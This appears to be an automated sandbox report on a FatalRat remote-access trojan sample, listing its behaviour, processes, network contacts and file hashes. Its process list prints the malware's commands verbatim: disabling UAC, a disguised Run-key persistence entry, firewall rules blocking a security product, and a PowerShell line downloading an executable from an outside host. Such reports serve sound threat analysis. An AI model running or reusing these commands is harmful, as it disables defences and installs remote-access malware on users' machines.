Malware Analysis Report

2025-03-15 03:49

Sample ID 250223-pw7v1axkcs
Target 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk
SHA256 b17337db64b6ab60e969cec89c36058baf5e100c25684bda9beb0afa1c342b4d
Tags
fatalrat defense_evasion discovery execution infostealer persistence privilege_escalation rat stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

b17337db64b6ab60e969cec89c36058baf5e100c25684bda9beb0afa1c342b4d

Threat Level: Known bad

The file 2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk was found to be: Known bad.

Malicious Activity Summary

fatalrat defense_evasion discovery execution infostealer persistence privilege_escalation rat stealer trojan

UAC bypass

Fatalrat family

FatalRat

Fatal Rat payload

Blocklisted process makes network request

Modifies Windows Firewall

Downloads MZ/PE file

Loads dropped DLL

Executes dropped EXE

Checks computer location settings

Command and Scripting Interpreter: PowerShell

Drops desktop.ini file(s)

Adds Run key to start application

Checks installed software on the system

System Location Discovery: System Language Discovery

Event Triggered Execution: Netsh Helper DLL

Unsigned PE

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Enumerates system info in registry

Modifies registry class

Suspicious use of SendNotifyMessage

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Checks processor information in registry

Suspicious behavior: AddClipboardFormatListener

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2025-02-23 12:41

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2025-02-23 12:41

Reported

2025-02-23 12:44

Platform

win7-20240903-en

Max time kernel

148s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe"

Signatures

FatalRat

stealer trojan fatalrat

Fatalrat family

fatalrat

UAC bypass

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\system32\reg.exe N/A

Fatal Rat payload

rat infostealer
Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies Windows Firewall

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Windows\CurrentVersion\Run\GoogleUpdata_Service = "C:\\programdata\\lnk\\dick.lnk" C:\Windows\System32\reg.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\programdata\20250223024200\Agghosts.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\programdata\20250223024200\Agghosts.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\programdata\20250223024200\Agghosts.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A
N/A N/A C:\programdata\20250223024200\Agghosts.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\programdata\20250223024200\Agghosts.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2736 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\system32\cmd.exe
PID 2736 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\system32\cmd.exe
PID 2736 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\system32\cmd.exe
PID 2736 wrote to memory of 2384 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\programdata\20250223024200\Agghosts.exe
PID 2736 wrote to memory of 2384 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\programdata\20250223024200\Agghosts.exe
PID 2736 wrote to memory of 2384 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\programdata\20250223024200\Agghosts.exe
PID 2736 wrote to memory of 2384 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\programdata\20250223024200\Agghosts.exe
PID 2000 wrote to memory of 600 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2000 wrote to memory of 600 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2000 wrote to memory of 600 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 2736 wrote to memory of 276 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\System32\reg.exe
PID 2736 wrote to memory of 276 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\System32\reg.exe
PID 2736 wrote to memory of 276 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\System32\reg.exe
PID 2736 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\system32\cmd.exe
PID 2736 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\system32\cmd.exe
PID 2736 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\system32\cmd.exe
PID 2736 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\system32\cmd.exe
PID 2736 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\system32\cmd.exe
PID 2736 wrote to memory of 2764 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\system32\cmd.exe
PID 2764 wrote to memory of 1564 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2764 wrote to memory of 1564 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2764 wrote to memory of 1564 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2008 wrote to memory of 236 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 2008 wrote to memory of 236 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 2008 wrote to memory of 236 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 2008 wrote to memory of 1688 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2008 wrote to memory of 1688 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2008 wrote to memory of 1688 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2764 wrote to memory of 2172 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2764 wrote to memory of 2172 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2764 wrote to memory of 2172 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2764 wrote to memory of 2204 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2764 wrote to memory of 2204 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2764 wrote to memory of 2204 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2764 wrote to memory of 1292 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2764 wrote to memory of 1292 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2764 wrote to memory of 1292 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2764 wrote to memory of 444 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2764 wrote to memory of 444 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2764 wrote to memory of 444 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2764 wrote to memory of 892 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2764 wrote to memory of 892 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2764 wrote to memory of 892 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2764 wrote to memory of 1208 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2764 wrote to memory of 1208 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2764 wrote to memory of 1208 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2764 wrote to memory of 1840 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2764 wrote to memory of 1840 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2764 wrote to memory of 1840 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe

Processes

C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe

"C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe"

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Public\Downloads\20250223024200\1.bat" "

C:\programdata\20250223024200\Agghosts.exe

"C:\programdata\20250223024200\Agghosts.exe"

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdata_Service /d "C:\programdata\lnk\dick.lnk" /f

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Public\Videos\download_and_run.bat" "

C:\Windows\system32\cmd.exe

cmd /c ""C:\Users\Public\Downloads\20250223024200\fhq.bat" "

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="Block Program Network Access" dir=in action=block program="" enable=yes

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://baba-1336130708.cos.ap-tokyo.myqcloud.com/tsetup-x64.5.11.1.exe', 'C:\Users\Public\Videos\bin.exe')"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="Block Program Network Access" dir=out action=block program="" enable=yes

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="Block Program Network Access2" dir=in action=block program="safemon\360tray.exe=360Safe.exe" enable=yes

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="Block Program Network Access2" dir=out action=block program="safemon\360tray.exe=360Safe.exe" enable=yes

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state on

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile settings inboundusernotification disable

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile settings inboundusernotification disable

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile settings inboundusernotification disable

Network

Country Destination Domain Proto
US 8.8.8.8:53 baba-1336130708.cos.ap-tokyo.myqcloud.com udp
JP 43.128.240.48:443 baba-1336130708.cos.ap-tokyo.myqcloud.com tcp
N/A 127.0.0.1:49245 tcp
US 8.8.8.8:53 www.baidu.com udp
CN 103.235.47.188:80 www.baidu.com tcp
US 8.8.8.8:53 spoutry.it.com udp
JP 118.107.15.176:8081 spoutry.it.com tcp
JP 43.128.240.48:443 baba-1336130708.cos.ap-tokyo.myqcloud.com tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.19.117.18:80 crl.microsoft.com tcp
US 8.8.8.8:53 www.microsoft.com udp
GB 2.17.5.133:80 www.microsoft.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\CabF124.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\TarF3E5.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

memory/2736-36-0x0000000003DE0000-0x00000000041F4000-memory.dmp

memory/2736-38-0x0000000001CE0000-0x0000000001CE1000-memory.dmp

memory/2736-37-0x0000000004200000-0x0000000004619000-memory.dmp

memory/2736-35-0x0000000004200000-0x0000000004619000-memory.dmp

memory/2736-39-0x0000000004200000-0x0000000004619000-memory.dmp

C:\Users\Public\Downloads\20250223024200\1.bat

MD5 fa42ebb1071abc0e618c296ea2cf71a6
SHA1 9e0c0737b0e37b3e821d011eecd9b0c7c9f2a15a
SHA256 395f835731d25803a791db984062dd5cfdcade6f95cc5d0f68d359af32f6258d
SHA512 0ed9919675c224201996caeeecf625a1db00a70af5d3ba135dc3d6fa16bfcc562426c813e21b4e861f04d312635be3528d79b5c49b23e78161f2b051fa9aaf05

C:\ProgramData\20250223024200\Agghosts.exe

MD5 2a24dcd41bc3c5b5f7eceda525786578
SHA1 7e898f9ee5a97a1a261326f0168e8de44dcf8af4
SHA256 169e9e4b23878035551455f4e5dbd01ece204e59fe75361680e8786998059ca7
SHA512 aaded4c72d3fa77eefd9d4b098288dd6923bd79813466d93313d6acb00fea9bb90248fff92cc89a625c60ae3b7cc1c27e8bb178fdac624ec896267da57b9fd6a

C:\ProgramData\lnk\2.lnk

MD5 33d26e34abac9364def07a7bc4c53043
SHA1 a2132a28c45de1a5410ea034fb841a962221c669
SHA256 61419b248afc224acea8715cc94010539d847de72c1a2014a8312eb036115aa2
SHA512 7fd13729ba06fba1febdefb24b3e2ad97681b897e68be0ccfebb9992f89a7a15734a355502e89687ea33fc4bf15648074942e21a43b8ed3acdf162159287bac6

C:\programdata\20250223024200\libcef.dll

MD5 b7f8c3416cdfd6f46c790da064f66099
SHA1 d7ae9a3d49bbf1981e7d6604128e18b6cd160bd6
SHA256 b9edf03447cf402e24da384c146c9d1536871a47518c795c4aea6550e3abd94d
SHA512 24272954e57f4f4f81dad90469e84946549e3441ba599f8b819d069b803687b3da35f449c0f18755352dba208d6d63af1d6b53c0a56adbd36540b1537bb99dc7

C:\Users\Public\Videos\download_and_run.bat

MD5 a90ccfd040d774b547f7d258b8e03661
SHA1 c46e353d34723f9393482974a516d51dfb52440d
SHA256 d852cfc4107e9ce5bec7349ef180366bbb4fe0878e725325a2b844f93a1ac1e2
SHA512 bdc816781c44b6e9bbc8207a3c0466a45397cf7815f267add21abe243bf138b5bae7ffec867433bf249e139b726413f68b7002f541c89ae1a25bd1e6980abfd7

C:\programdata\20250223024200\Ensup.log

MD5 2fd94f6e1d71454d716a126f0d7450ac
SHA1 5d966df95c741880089e9078af921a22216516ec
SHA256 a599cbb05b69328655a7a0afc2644ed607c30a05edfb8fd6be2ea920c25b54b5
SHA512 340107b69fc49b8fe1acf37a3a6e40c4b7206cf3ae069fea6f4ba702a733401e1feef55e1d858b3529764bcd0ba371ef552f5838444b65b62545e1da150f9bb2

C:\Users\Public\Downloads\20250223024200\fhq.bat

MD5 3a7cb580bd340505f6dc5b4c829a3eca
SHA1 21cc730517d74fa1d13316d7e0d817f3bd710906
SHA256 1c1528b546aa29be6614707cbe408cb4b46e8ed05bf3fe6b388b9f22a4ee37e2
SHA512 c224fa676542b90f8fc990e574028af664dced61612855290fb23ce4acad2d6b9043e901365939106b591b6746b3e4ddada15eede88a947051e9d8083194e630

memory/2384-96-0x0000000000160000-0x0000000000189000-memory.dmp

memory/2736-94-0x0000000003DE0000-0x00000000041F4000-memory.dmp

memory/2736-93-0x0000000004200000-0x0000000004619000-memory.dmp

memory/1688-107-0x00000000023D0000-0x00000000023D8000-memory.dmp

memory/1688-106-0x000000001B5E0000-0x000000001B8C2000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 aea5c63f53c52acaf4ba4b9596cc834e
SHA1 e3fc687954187fbc81bad8ee865ee9b39df8e1c7
SHA256 28c518fd853b0a5e5d6f387fc63e1936c69a6029163a2f765ee71c4cace53ab0
SHA512 d3d6526182333f721a7efbcedcc8ff4bfa3d61b3f843d49b71cd74532b8fd3fe4751a8413be338ca07cc74a8059963401a26265df9546952f4f19f82ab448844

Analysis: behavioral2

Detonation Overview

Submitted

2025-02-23 12:41

Reported

2025-02-23 12:44

Platform

win10v2004-20250217-en

Max time kernel

141s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe"

Signatures

FatalRat

stealer trojan fatalrat

Fatalrat family

fatalrat

UAC bypass

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\system32\reg.exe N/A

Fatal Rat payload

rat infostealer
Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies Windows Firewall

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\programdata\20250223024202\Agghosts.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleUpdata_Service = "C:\\programdata\\lnk\\dick.lnk" C:\Windows\System32\reg.exe N/A

Checks installed software on the system

discovery

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
